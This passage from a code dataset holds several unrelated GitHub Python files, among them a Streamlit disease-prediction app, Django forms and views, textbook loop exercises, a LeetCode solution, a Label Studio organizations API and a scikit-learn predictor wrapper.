(selected == 'Predict Heart Disease'):\n # page title\n st.title('Heart Disease Prediction using ML')\n col1, col2, col3 = st.columns(3)\n with col1:\n age = st.text_input('Age') \n with col2:\n sex = st.text_input('Sex') \n with col3:\n cp = st.text_input('Chest Pain types') \n with col1:\n trestbps = st.text_input('Resting Blood Pressure') \n with col2:\n chol = st.text_input('Serum Cholestoral in mg/dl')\n with col3:\n fbs = st.text_input('Fasting Blood Sugar > 120 mg/dl')\n with col1:\n restecg = st.text_input('Resting Electrocardiographic results')\n with col2:\n thalach = st.text_input('Maximum Heart Rate achieved')\n with col3:\n exang = st.text_input('Exercise Induced Angina')\n with col1:\n oldpeak = st.text_input('ST depression induced by exercise')\n with col2:\n slope = st.text_input('Slope of the peak exercise ST segment') \n with col3:\n ca = st.text_input('Major vessels colored by flourosopy') \n with col1:\n thal = st.text_input('thal: 0 = normal; 1 = fixed defect; 2 = reversable defect')\n \n # code for Prediction\n heart_diagnosis = ''\n # creating a button for Prediction\n if st.button('Heart Disease Test Result'):\n heart_prediction = heart_model.predict([[age, sex, cp, trestbps, chol, fbs, restecg,thalach,exang,oldpeak,slope,ca,thal]]) \n if (heart_prediction[0] == 1):\n heart_diagnosis = 'The person is having heart disease'\n else:\n heart_diagnosis = 'The person does not have any heart disease' \n st.success(heart_diagnosis)\n\n\n# Parkinson's Prediction Page\nif (selected == \"Predict Parkinsons Disease\"):\n # page title\n st.title(\"Parkinson's Disease Prediction using ML\")\n col1, col2, col3, col4, col5 = st.columns(5) \n with col1:\n fo = st.text_input('MDVP:Fo(Hz)') \n with col2:\n fhi = st.text_input('MDVP:Fhi(Hz)') \n with col3:\n flo = st.text_input('MDVP:Flo(Hz)') \n with col4:\n Jitter_percent = st.text_input('MDVP:Jitter(%)') \n with col5:\n Jitter_Abs = st.text_input('MDVP:Jitter(Abs)') \n with col1:\n RAP = st.text_input('MDVP:RAP') \n with col2:\n PPQ = st.text_input('MDVP:PPQ') \n with col3:\n DDP = st.text_input('Jitter:DDP') \n with col4:\n Shimmer = st.text_input('MDVP:Shimmer') \n with col5:\n Shimmer_dB = st.text_input('MDVP:Shimmer(dB)') \n with col1:\n APQ3 = st.text_input('Shimmer:APQ3')\n with col2:\n APQ5 = st.text_input('Shimmer:APQ5') \n with col3:\n APQ = st.text_input('MDVP:APQ') \n with col4:\n DDA = st.text_input('Shimmer:DDA') \n with col5:\n NHR = st.text_input('NHR')\n with col1:\n HNR = st.text_input('HNR') \n with col2:\n RPDE = st.text_input('RPDE') \n with col3:\n DFA = st.text_input('DFA') \n with col4:\n spread1 = st.text_input('spread1')\n with col5:\n spread2 = st.text_input('spread2') \n with col1:\n D2 = st.text_input('D2') \n with col2:\n PPE = st.text_input('PPE')\n \n # code for Prediction\n parkinsons_diagnosis = ''\n # creating a button for Prediction \n if st.button(\"Parkinson's Test Result\"):\n parkinsons_prediction = parkinson_model.predict([[fo, fhi, flo, Jitter_percent, Jitter_Abs, RAP, PPQ,DDP,Shimmer,Shimmer_dB,APQ3,APQ5,APQ,DDA,NHR,HNR,RPDE,DFA,spread1,spread2,D2,PPE]]) \n \n if (parkinsons_prediction[0] == 1):\n parkinsons_diagnosis = \"The person has Parkinson's disease\"\n else:\n parkinsons_diagnosis = \"The person does not have Parkinson's disease\" \n st.success(parkinsons_diagnosis)\n\n\n# Breast Cancer Prediction Page\nif (selected == \"Predict Breast Cancer\"):\n # page title\n st.title(\"Breast Cancer Prediction using ML\")\n col1, col2, col3, col4, col5 ,col6= st.columns(6) \n with col1:\n 
meanradius = st.text_input('Mean Radius') \n    with col2:\n        meantexture = st.text_input('Mean Texture') \n    with col3:\n        meanperimeter = st.text_input('Mean Perimeter') \n    with col4:\n        meanarea = st.text_input('Mean Area') \n    with col5:\n        meansmoothness = st.text_input('Mean Smoothness') \n    with col6:\n        meancompactness = st.text_input('Mean Compactness') \n    with col1:\n        meanconcavity = st.text_input('Mean Concavity') \n    with col2:\n        meanconcavepoints = st.text_input('Mean Concave Points') \n    with col3:\n        meansymmetry = st.text_input('Mean Symmetry') \n    with col4:\n        meanfractaldimension = st.text_input('Mean Fractal Dimension') \n    with col5:\n        radiuserror = st.text_input('Radius Error') \n    with col6:\n        textureerror = st.text_input('Texture Error') \n    with col1:\n        perimetererror = st.text_input('Perimeter Error') \n    with col2:\n        areaerror = st.text_input('Area Error') \n    with col3:\n        smoothnesserror = st.text_input('Smoothness Error') \n    with col4:\n        compactnesserror = st.text_input('Compactness Error') \n    with col5:\n        concavityerror = st.text_input('Concavity Error') \n    with col6:\n        concavepointserror = st.text_input('Concave Points Error') \n    with col1:\n        symmetryerror = st.text_input('Symmetry Error') \n    with col2:\n        fractionaldimensionerror = st.text_input('Fractal Dimension Error') \n    with col3:\n        worstradius = st.text_input('Worst Radius') \n    with col4:\n        worsttexture = st.text_input('Worst Texture') \n    with col5:\n        worstperimeter = st.text_input('Worst Perimeter') \n    with col6:\n        worstarea = st.text_input('Worst Area') \n    with col1:\n        worstsmoothness = st.text_input('Worst Smoothness') \n    with col2:\n        worstcompactness = st.text_input('Worst Compactness') \n    with col3:\n        worstconcavity = st.text_input('Worst Concavity') \n    with col4:\n        worstconcavepoints = st.text_input('Worst Concave Points') \n    with col5:\n        worstsymmetry = st.text_input('Worst Symmetry') \n    with col6:\n        worstfractaldimension = st.text_input('Worst Fractal Dimension') \n    # code for Prediction\n    breast_diagnosis = ''\n    # creating a button for Prediction    \n    if st.button(\"Breast Cancer Test Result\"):\n        # pass the entered values (cast to float), not the feature names\n        cancer_prediction = cancer_model.predict([[float(x) for x in [meanradius, meantexture, meanperimeter, meanarea, meansmoothness, meancompactness, meanconcavity, meanconcavepoints, meansymmetry, meanfractaldimension, radiuserror, textureerror, perimetererror, areaerror, smoothnesserror, compactnesserror, concavityerror, concavepointserror, symmetryerror, fractionaldimensionerror, worstradius, worsttexture, worstperimeter, worstarea, worstsmoothness, worstcompactness, worstconcavity, worstconcavepoints, worstsymmetry, worstfractaldimension]]]) \n        \n        if (cancer_prediction[0] == 1):\n            breast_diagnosis = \"The Tumor is Malignant\"\n        else:\n            breast_diagnosis = \"The Tumor is Benign\" \n        st.success(breast_diagnosis)","repo_name":"adirayer/Predict-Diseases","sub_path":"Diseases/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":9537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71057669227","text":"#!/usr/bin/env python\n\nfrom setuptools import setup\n\nexec(open(\"kin/version.py\").read())\n\nwith open('requirements.txt') as f:\n    requires = [line.strip() for line in f if line.strip()]\nwith open('requirements-dev.txt') as f:\n    tests_requires = [line.strip() for line in f if line.strip()]\n\nsetup(\n    name='kin-sdk-python',\n    version=__version__,\n    description='KIN SDK for Python',\n    author='Kin 
Foundation',\n maintainer='David Bolshoy',\n maintainer_email='david.bolshoy@kik.com',\n url='https://github.com/kinfoundation/kin-sdk-python',\n license='GPLv2',\n packages=[\"kin\"],\n long_description=open(\"README.md\").read(),\n keywords = [\"kin\", \"cryptocurrency\", \"blockchain\"],\n classifiers=[\n 'License :: OSI Approved :: MIT License',\n 'Intended Audience :: Developers',\n 'Development Status :: 4 - Beta',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 3',\n ],\n install_requires=requires,\n tests_require=tests_requires,\n)\n","repo_name":"kinecosystem/kin-sdk-python-ethereum","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1090,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"37"} +{"seq_id":"42632872007","text":"from django import forms\n\nfrom .models import Product\n\n\nclass ProductForm(forms.ModelForm):\n title = forms.CharField(label='Title custom', widget=forms.TextInput(\n attrs={\n \"placeholder\": \"HI Janna\",\n }\n ))\n description = forms.CharField(required=True, widget=forms.Textarea(\n attrs={\n \"placeholder\": \"HI Janna\",\n \"class\": \"new-class-name two\",\n \"id\": \"desc\",\n \"rows\": 12,\n \"cols\": 120,\n\n }\n ))\n price = forms.DecimalField(initial=155.5)\n\n class Meta:\n model = Product\n fields = [\n 'title',\n 'description',\n 'price'\n ]\n\n def clean_title(self, *args, **kwargs):\n title = self.cleaned_data.get(\"title\")\n if not \"mos\" in title:\n raise forms.ValidationError(\"this is not contains mos\")\n if len(title) < 4:\n raise forms.ValidationError(\"short\")\n return title\n\n\nclass RawProductForm(forms.Form):\n title = forms.CharField(label='Title custom', widget=forms.TextInput(\n attrs={\n \"placeholder\": \"HI Janna\",\n }\n ))\n description = forms.CharField(required=False, widget=forms.Textarea(\n attrs={\n \"placeholder\": \"HI Janna\",\n \"class\": \"new-class-name two\",\n \"id\": \"desc\",\n \"rows\": 12,\n \"cols\": 120,\n\n }\n ))\n price = forms.DecimalField(initial=155.5)\n","repo_name":"mostafaadawy/first_django","sub_path":"products/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1465,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"23908400711","text":"# 7-1. Rental Car: Write a program that asks the user what kind of rental car\n# they would like. Print a message about that car, such as “Let me see if I can\n# find you a Subaru.”\n# print('\\n---\\n7-1\\n---\\n')\n# car_request = input('What kind of rental car would you like? ')\n# print(f'Let me see if I can find you a {car_request}.')\n\n# 7-2. Restaurant Seating: Write a program that asks the user how many people\n# are in their dinner group. If the answer is more than eight, print a message\n# saying they’ll have to wait for a table. Otherwise, report that their table\n# is ready.\nprint('\\n---\\n7-2\\n---\\n')\ngroup_size = int(input('How many people are in your dinner group? '))\n\nif group_size > 8:\n print('Sorry, you will have to wait for a table.')\nelse: \n print('Your table is ready.')\n\n# 7-3. 
Multiples of Ten: Ask the user for a number, and then report whether the\n# number is a multiple of 10 or not.\nprint('\\n---\\n7-3\\n---\\n')\nis_multiple_of_10 = int(input('Please enter a number: '))\nif is_multiple_of_10 % 10 == 0:\n print('This is a multiple of 10.')\nelse: \n print('This is not a multiple of 10')\n\n# 7-4. Pizza Toppings: Write a loop that prompts the user to enter a series of\n# pizza toppings until they enter a 'quit' value. As they enter each topping\n# print a message saying you’ll add that topping to their pizza.\nprint('\\n---\\n7-3\\n---\\n')\nkeep_going = True\ntoppings = []\nwhile keep_going is True:\n topping = input(\"What topping would you like to add? \")\n if topping == 'quit':\n keep_going = False\n else:\n toppings.append(topping)\n print(f'We will add {topping} to your pizza.')\nprint(toppings)\n\n# 7-5. Movie Tickets: A movie theater charges different ticket prices depending\n# on a person’s age. If a person is under the age of 3, the ticket is free; if\n# they are between 3 and 12, the ticket is $10; and if they are over age 12,\n# the ticket is $15. Write a loop in which you ask users their age, and then\n# tell them the cost of their movie ticket.\nprint('\\n---\\n7-5\\n---\\n')\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n keep_going = False\n elif int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n\n# 7-6. Three Exits: Write different versions of either Exercise 7-4 or Exercise\n# 7-5 that do each of the following at least once:\nprint('\\n---\\n7-3\\n---\\n')\n# • Use a conditional test in the while statement to stop the loop.\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n keep_going = False\n elif int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n# • Use an active variable to control how long the loop runs.\ni=0\nwhile i < 1:\n age = input(\"What is your age?\")\n if int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n i+= 1\n# • Use a break statement to exit the loop when the user enters a 'quit' value.\nkeep_going = True\n\nwhile keep_going is True:\n age = input(\"What is your age?\")\n if age == 'quit':\n break\n if int(age) < 3:\n print('Their ticket is free')\n elif int(age) <= 12:\n print('The ticket is $10')\n elif int(age) > 12:\n print('The ticket is $15')\n\n# 7-7. Infinity: Write a loop that never ends, and run it. (To end the loop\n# press ctrl-C or close the window displaying the output.)\nprint('\\n---\\n7-7\\n---\\n')\n\n# 7-8. Deli: Make a list called sandwich_orders and fill it with the names of\n# vari- ous sandwiches. Then make an empty list called finished_sandwiches.\n# Loop through the list of sandwich orders and print a message for each order\n# such as I made your tuna sandwich. As each sandwich is made, move it to the\n# list of finished sandwiches. 
After all the sandwiches have been made, print a\n# message listing each sandwich that was made.\nprint('\\n---\\n7-8\\n---\\n')\nsandwich_orders = ['rueben', 'blt', 'hamburger', 'avacado']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n sandwich = sandwich_orders.pop()\n print('I have made your {}.'.format(sandwich))\n finished_sandwiches.append(sandwich)\n\nprint(\"Today we made an {}, a {}, {}, and a {} sandiwch.\"\\\n .format(finished_sandwiches[0],\n finished_sandwiches[1],\n finished_sandwiches[2],\n finished_sandwiches[3]))\n \n\n# 7-9. No Pastrami: Using the list sandwich_orders from Exercise 7-8, make sure\n# the sandwich 'pastrami' appears in the list at least three times. Add code\n# near the beginning of your program to print a message saying the deli has run\n# out of pastrami, and then use a while loop to remove all occurrences of\n# 'pastrami' from sandwich_orders. Make sure no pastrami sandwiches end up in\n# finished_sandwiches.\nprint('\\n---\\n7-9\\n---\\n')\nsandwich_orders = ['rueben', 'blt', 'hamburger','pastrami', 'pastrami',\n 'avacado', 'pastrami']\nfinished_sandwiches = []\n\nprint('The deli has run out of pastrami')\n\nwhile 'pastrami' in sandwich_orders:\n sandwich_orders.remove('pastrami')\n\nwhile sandwich_orders:\n sandwich = sandwich_orders.pop()\n print('I have made your {}.'.format(sandwich))\n finished_sandwiches.append(sandwich)\n\nprint('Today we made the following sandwiches: ')\nfor sandwich in finished_sandwiches:\n print(f'A {sandwich}')\n\n# 7-10. Dream Vacation: Write a program that polls users about their dream\n# vacation. Write a prompt similar to If you could visit one place in the\n# world, where would you go? Include a block of code that prints the results of\n# the poll.\nprint('\\n---\\n7-10\\n---\\n')\npolling_active = True\nresults = {}\n\nwhile polling_active:\n name = input(\"Please enter your name? \")\n destination = input(\"Where would you like to go? \")\n results[name] = destination\n\n next_up = input(\"Is there anyone else that would like to enter a location? \"\n \"(yes/no)\")\n if next_up == 'no':\n polling_active = False\n\nfor person in results.items():\n print(f\"{person[0]} would like to go to {person[1]}. 
\")\n","repo_name":"joshua-shorterivey/tutorial_python_crash_course","sub_path":"ch7_try_it_yourself.py","file_name":"ch7_try_it_yourself.py","file_ext":"py","file_size_in_byte":6362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"38726760731","text":"from typing import List\n\n\nclass Solution:\n def jobScheduling(self, startTime: List[int], endTime: List[int], profit: List[int]) -> int:\n jobs = [(i, j, k) for i, j, k in zip(startTime, endTime, profit)]\n # print(jobs)\n jobs.sort(key=lambda x: x[0])\n # print(jobs)\n n = len(jobs)\n\n memo = [0 for i in range(len(jobs)+1)]\n\n def top_down_dp(jobs, idx):\n # Without memoization.\n if idx >= len(jobs):\n return 0\n\n if memo[idx] != 0:\n return memo[idx]\n\n next_job = len(jobs)\n l, r = idx, len(jobs)-1\n while l <= r:\n mid = (l+r)//2\n if jobs[mid][0] >= jobs[idx][1]:\n r = mid-1\n else:\n l = mid+1\n next_job = l\n\n res = max(\n # Skip the job at idx\n jobs[idx][2] + \\\n top_down_dp(jobs, next_job), top_down_dp(jobs, idx+1)\n )\n memo[idx] = res\n return res\n\n ans = top_down_dp(jobs, 0)\n # print(ans)\n return ans\n","repo_name":"Keval78/Programming_Solutions","sub_path":"LeetCode/Daily/1235 Maximum Profit in Job Scheduling.py","file_name":"1235 Maximum Profit in Job Scheduling.py","file_ext":"py","file_size_in_byte":1149,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"8074546920","text":"from django.http import HttpResponseRedirect\r\nfrom django.shortcuts import render\r\n\r\n# Create your views here.\r\nfrom django.urls import reverse\r\nfrom django.utils.decorators import method_decorator\r\nfrom django.views.decorators.csrf import csrf_protect\r\n\r\nfrom mainapp.models import Diary\r\n\r\n\r\ndef create_diary(request):\r\n\r\n # 처음으로 생성할 경우\r\n if request.method == \"POST\":\r\n print('hello')\r\n diary_img = request.FILES['diary_img']\r\n diary_content = request.POST.get('diary_content')\r\n diary_share_state = False\r\n\r\n diary = Diary()\r\n\r\n diary.diary_img = diary_img\r\n diary.diary_content = diary_content\r\n diary.diary_share_state = diary_share_state\r\n diary.save()\r\n\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n if request.method == 'GET':\r\n print('get')\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n else:\r\n print(\"no!\")\r\n return render(request, template_name='diaryapp/create.html', context={})\r\n\r\n","repo_name":"Team-Samkkingkkang/popoDiary_postgres","sub_path":"diaryapp/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1089,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"39243109014","text":"from convert_conllu import convert_conllu_file\nfrom process_output import export_list_to_file, get_expected_output_list, process_real_output_list\nfrom tokenizer_accuracy import get_tokenizer_accuracy, get_total_correct_token\n\n\n\n# Dataset list\ndatasets = [\"id_csui-ud-test\", \"id_gsd-ud-test\", \"id_pud-ud-test\"]\n\nprint(\"Result of Aksara Tokenizer\")\nprint(\"-\"*70)\n\nfor i in range(0, len(datasets)):\n # Print dataset name\n print(\"Dataset name: \" + datasets[i])\n\n # Get expected tokenizer output from a dataset file\n exp_output_result = get_expected_output_list(\n \"processed_file/expected_output_\" + datasets[i] + \".txt\")\n\n # Print total input of dataset\n print(\"Total input: \" + 
str(len(exp_output_result)))\n\n # Get real tokenizer output from a dataset file\n real_output_result = convert_conllu_file(\n \"output_tokenizer/output-aksara-input_\" + datasets[i] + \".txt.conllu\")\n\n # Process real tokenizer output\n real_output_result_processed = process_real_output_list(\n exp_output_result, real_output_result[1])\n\n total_token_list = len(exp_output_result)\n total_correct_token_list = 0\n total_token = 0\n total_correct_token = 0\n uncorrect_token_list = []\n\n for j in range(len(exp_output_result)):\n total_token_data = len(exp_output_result[j])\n total_token += total_token_data\n\n # Get total correct token of real ouput\n total_correct_token_data = get_total_correct_token(\n real_output_result_processed[j], exp_output_result[j])\n total_correct_token += total_correct_token_data\n\n # Check if output from tokenizer is correct\n if total_token_data == total_correct_token_data:\n total_correct_token_list += 1\n else:\n uncorrect_token_list.append(real_output_result_processed[j])\n\n # Print total token list of expected output and total correct token list of real output\n print(\"Total token list: \" + str(total_token_list))\n print(\"Total correct token list: \" + str(total_correct_token_list))\n\n # Print total token of expected output and total correct token of real output\n print(\"Total token: \" + str(total_token))\n print(\"Total correct token: \" + str(total_correct_token))\n\n # Get tokenizer accuracy\n accuracy = get_tokenizer_accuracy(total_correct_token, total_token)\n print(\"Tokenizer accuracy: \" + str(accuracy))\n\n # Export luncorrect token list to a file\n export_list_to_file(\n uncorrect_token_list,\n \"uncorrect_token/uncorrect-token-aksara-\" + datasets[i] + \".txt\")\n\n print(\"-\"*70)\n","repo_name":"shafiraputri01/nlp-tk1","sub_path":"process_output_aksara.py","file_name":"process_output_aksara.py","file_ext":"py","file_size_in_byte":2580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72409348907","text":"import logging\nfrom rest_framework import status\nfrom django.urls import reverse\nfrom django.conf import settings\nfrom rest_framework.parsers import FormParser, JSONParser, MultiPartParser\nfrom rest_framework import generics\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.pagination import PageNumberPagination\n\nfrom drf_yasg.utils import swagger_auto_schema\nfrom drf_yasg import openapi\nfrom django.utils.decorators import method_decorator\nfrom django.conf import settings\n\nfrom label_studio.core.permissions import all_permissions, ViewClassPermission\nfrom label_studio.core.utils.common import get_object_with_check_and_log, bool_from_request\n\nfrom organizations.models import Organization\nfrom organizations.serializers import (\n OrganizationSerializer, OrganizationIdSerializer, OrganizationMemberUserSerializer, OrganizationInviteSerializer\n)\nfrom organizations.serializers import OrganizationCreatedSerializer\nfrom rest_framework.decorators import api_view\nfrom rest_framework.decorators import permission_classes\nfrom rest_framework.permissions import IsAuthenticated\n\n\nlogger = logging.getLogger(__name__)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='List your organizations',\n operation_description=\"\"\"\n Return a list of the organizations you've created or that you have access to.\n \"\"\"\n ))\nclass 
OrganizationListAPI(generics.ListCreateAPIView):\n queryset = Organization.objects.all().order_by('-created_at')\n parser_classes = (JSONParser, FormParser, MultiPartParser)\n permission_required = ViewClassPermission(\n GET=all_permissions.organizations_view,\n PUT=all_permissions.organizations_change,\n POST=all_permissions.organizations_create,\n PATCH=all_permissions.organizations_change,\n DELETE=all_permissions.organizations_change,\n )\n serializer_class = OrganizationIdSerializer\n\n def get_object(self):\n org = get_object_with_check_and_log(self.request, Organization, pk=self.kwargs[self.lookup_field])\n self.check_object_permissions(self.request, org)\n return org\n\n # 获取已经关联用户的组织\n # def filter_queryset(self, queryset):\n # return queryset.filter(users=self.request.user).distinct()\n\n def get(self, request, *args, **kwargs):\n return super(OrganizationListAPI, self).get(request, *args, **kwargs)\n\n @swagger_auto_schema(auto_schema=None)\n def post(self, request, *args, **kwargs):\n data = request.POST.dict()\n if not data:\n data = request.data\n data['created_by'] = request.user.id\n serializer = OrganizationCreatedSerializer(data=data)\n # serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n self.perform_create(serializer)\n headers = self.get_success_headers(serializer.data)\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n\nclass OrganizationMemberPagination(PageNumberPagination):\n page_size = 20\n page_size_query_param = 'page_size'\n\n def get_page_size(self, request):\n # emulate \"unlimited\" page_size\n if self.page_size_query_param in request.query_params and request.query_params[self.page_size_query_param] == '-1':\n return 1000000\n return super().get_page_size(request)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='Get organization members list',\n operation_description='Retrieve a list of the organization members and their IDs.',\n manual_parameters=[\n openapi.Parameter(\n name='id',\n type=openapi.TYPE_INTEGER,\n in_=openapi.IN_PATH,\n description='A unique integer value identifying this organization.'),\n ],\n ))\nclass OrganizationMemberListAPI(generics.ListAPIView):\n\n parser_classes = (JSONParser, FormParser, MultiPartParser)\n permission_required = ViewClassPermission(\n GET=all_permissions.organizations_view,\n PUT=all_permissions.organizations_change,\n PATCH=all_permissions.organizations_change,\n DELETE=all_permissions.organizations_change,\n )\n serializer_class = OrganizationMemberUserSerializer\n pagination_class = OrganizationMemberPagination\n\n def get_serializer_context(self):\n return {\n 'contributed_to_projects': bool_from_request(self.request.GET, 'contributed_to_projects', False)\n }\n\n def get_queryset(self):\n org = generics.get_object_or_404(self.request.user.organizations, pk=self.kwargs[self.lookup_field])\n return org.members.order_by('user__username')\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary=' Get organization settings',\n operation_description='Retrieve the settings for a specific organization by ID.'\n ))\n@method_decorator(name='patch', decorator=swagger_auto_schema(\n tags=['Organizations'],\n operation_summary='Update organization settings',\n operation_description='Update the settings for a specific organization by ID.'\n ))\nclass OrganizationAPI(generics.RetrieveUpdateAPIView, generics.DestroyAPIView):\n\n 
parser_classes = (JSONParser, FormParser, MultiPartParser)\n    queryset = Organization.objects.all()\n    permission_required = all_permissions.organizations_change\n    serializer_class = OrganizationSerializer\n\n    redirect_route = 'organizations-dashboard'\n    redirect_kwarg = 'pk'\n\n    def get_object(self):\n        org = generics.get_object_or_404(self.queryset, pk=self.kwargs[\n            self.lookup_field])\n        self.check_object_permissions(self.request, org)\n        return org\n\n    def get(self, request, *args, **kwargs):\n        return super(OrganizationAPI, self).get(request, *args, **kwargs)\n\n    def patch(self, request, *args, **kwargs):\n        # self.queryset = Organization.objects.filter(pk=kwargs.get('pk'))\n        return super(OrganizationAPI, self).patch(request, *args, **kwargs)\n\n    @swagger_auto_schema(auto_schema=None)\n    def put(self, request, *args, **kwargs):\n        return super(OrganizationAPI, self).put(request, *args, **kwargs)\n\n    def delete(self, request, *args, **kwargs):\n        instance = self.get_object()\n        if instance.users.count() or instance.projects.count():\n            return Response(\n                status=status.HTTP_400_BAD_REQUEST,\n                data=dict(error='The organization has associated users or projects.')\n            )\n        # call super() on the enclosing class, not OrganizationListAPI\n        return super(OrganizationAPI, self).delete(request, *args, **kwargs)\n\n\n@method_decorator(name='get', decorator=swagger_auto_schema(\n    tags=[\"Invites\"],\n    operation_summary='Get organization invite link',\n    operation_description='Get a link to use to invite a new member to an organization in Label Studio Enterprise.',\n    responses={200: OrganizationInviteSerializer()}\n    ))\nclass OrganizationInviteAPI(APIView):\n    parser_classes = (JSONParser,)\n    permission_required = all_permissions.organizations_change\n\n    def get(self, request, *args, **kwargs):\n        org = get_object_with_check_and_log(self.request, Organization, pk=request.user.active_organization_id)\n        self.check_object_permissions(self.request, org)\n        invite_url = '{}?token={}'.format(reverse('user-signup'), org.token)\n        if hasattr(settings, 'FORCE_SCRIPT_NAME') and settings.FORCE_SCRIPT_NAME:\n            invite_url = invite_url.replace(settings.FORCE_SCRIPT_NAME, '', 1)\n        serializer = OrganizationInviteSerializer(data={'invite_url': invite_url, 'token': org.token})\n        serializer.is_valid()\n        return Response(serializer.data, status=200)\n\n\n@method_decorator(name='post', decorator=swagger_auto_schema(\n    tags=[\"Invites\"],\n    operation_summary='Reset organization token',\n    operation_description='Reset the token used in the invitation link to invite someone to an organization.',\n    responses={200: OrganizationInviteSerializer()}\n    ))\nclass OrganizationResetTokenAPI(APIView):\n    permission_required = all_permissions.organizations_invite\n    parser_classes = (JSONParser,)\n\n    def post(self, request, *args, **kwargs):\n        org = request.user.active_organization\n        org.reset_token()\n        logger.debug(f'New token for organization {org.pk} is {org.token}')\n        invite_url = '{}?token={}'.format(reverse('user-signup'), org.token)\n        serializer = OrganizationInviteSerializer(data={'invite_url': invite_url, 'token': org.token})\n        serializer.is_valid()\n        return Response(serializer.data, status=201)\n\n\n\"\"\"\n\"\"\"\n\n\n@api_view(['GET'])\n@permission_classes([IsAuthenticated])\ndef organization_all(request):\n    \"\"\"\n    :param request:\n    :return:\n    \"\"\"\n    data = request.data\n    queryset = Organization.objects.values('id', 'title')\n    return Response(data=list(queryset))\n\n\n@api_view(['PUT', 'PATCH'])\n@permission_classes([IsAuthenticated])\ndef organization_change(request):\n    \"\"\"\n    :param request:\n    :return:\n    \"\"\"\n    data = 
request.POST.dict()\n if not data:\n data = request.data\n o_id = data.get('organization_id')\n if not o_id:\n return Response(\n status=status.HTTP_400_BAD_REQUEST, data=dict(error='必须传组织参数')\n )\n try:\n o_id = int(o_id)\n except Exception as e:\n logger.warning('organization_id: ', o_id, ' message:', str(e))\n return Response(\n status=status.HTTP_400_BAD_REQUEST, data=dict(error='组织参数是整型')\n )\n\n query = Organization.objects.filter(id=o_id).first()\n request.user.active_organization = query\n request.user.save()\n return Response(data=dict(message=f\"更新成{query.title}\"))","repo_name":"ClaytonWang/lable-studio","sub_path":"label_studio/organizations/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":9958,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22455895018","text":"import numpy as np\nfrom scipy import spatial\nfrom sklearn import ensemble, linear_model\nfrom sklearn.ensemble.tests.test_gradient_boosting import boston\n\nfrom datamanager import DataManager\nfrom copy import deepcopy\n\nimport matplotlib.pyplot as plt\nfrom itertools import islice\nfrom sklearn.metrics import mean_squared_error\n\nfrom sklearn.ensemble import GradientBoostingClassifier, GradientBoostingRegressor\n\nclass Predictor:\n\n\tdef __init__(self, training_data, test_data, validation_data,\n\t\t\t\t training_labels, test_labels, validation_labels, predictor_func, closeness_cutoff=None):\n\t\tself.training_data = training_data\n\t\tself.test_data = test_data\n\t\tself.validation_data = validation_data\n\t\tself.training_labels = training_labels\n\t\tself.test_labels = test_labels\n\t\tself.validation_labels = validation_labels\n\t\tself.predictor_func = predictor_func\n\t\tself.closeness_cuttoff = closeness_cutoff\n\n\tdef train(self):\n\t\tif self.predictor_func == \"BestMatchingCase\":\n\t\t\tpass\n\t\telif self.predictor_func[:len('Regression')] == \"Regression\":\n\t\t\treturn self.regressor()\n\t\telif self.predictor_func == 'GRBT':\n\t\t\treturn self.GRBT_classifier()\n\t\telse:\n\t\t\tprint(\"Didn't recognize predictor function: \"+self.predictor_func)\n\t\t\tprint('Use regresion')\n\t\t\treturn self.regressor()\n\t\treturn True\n\n\tdef regressor(self):\n\t\tif not self.has_data():\n\t\t\treturn False\n\t\t#if not (check_if_distinct_values(self.training_labels)):\n\t\t#\treturn False\n\t\t#if not (check_if_distinct_values(self.test_labels)):\n\t\t#\treturn False\n\n\t\t# multivariate input\n\t\tX = self.training_data\n\t\t# multivariate output\n\t\tY = self.training_labels\n\t\twhich_regressor = self.predictor_func[len('Regression'):]\n\t\tif (which_regressor == 'Lasso'):\n\t\t\t# Lasso\n\t\t\tself.clf = linear_model.Lasso()\n\t\telif (which_regressor == 'ElasticNet'):\n\t\t\t# ElasticNet\n\t\t\tself.clf = linear_model.ElasticNet()\n\t\telif (which_regressor == 'Linear'):\n\t\t\tself.clf = linear_model.LinearRegression()\n\t\telse:\n\t\t\tprint(\"Didnt recognize regressorfunction: \"+which_regressor+\". 
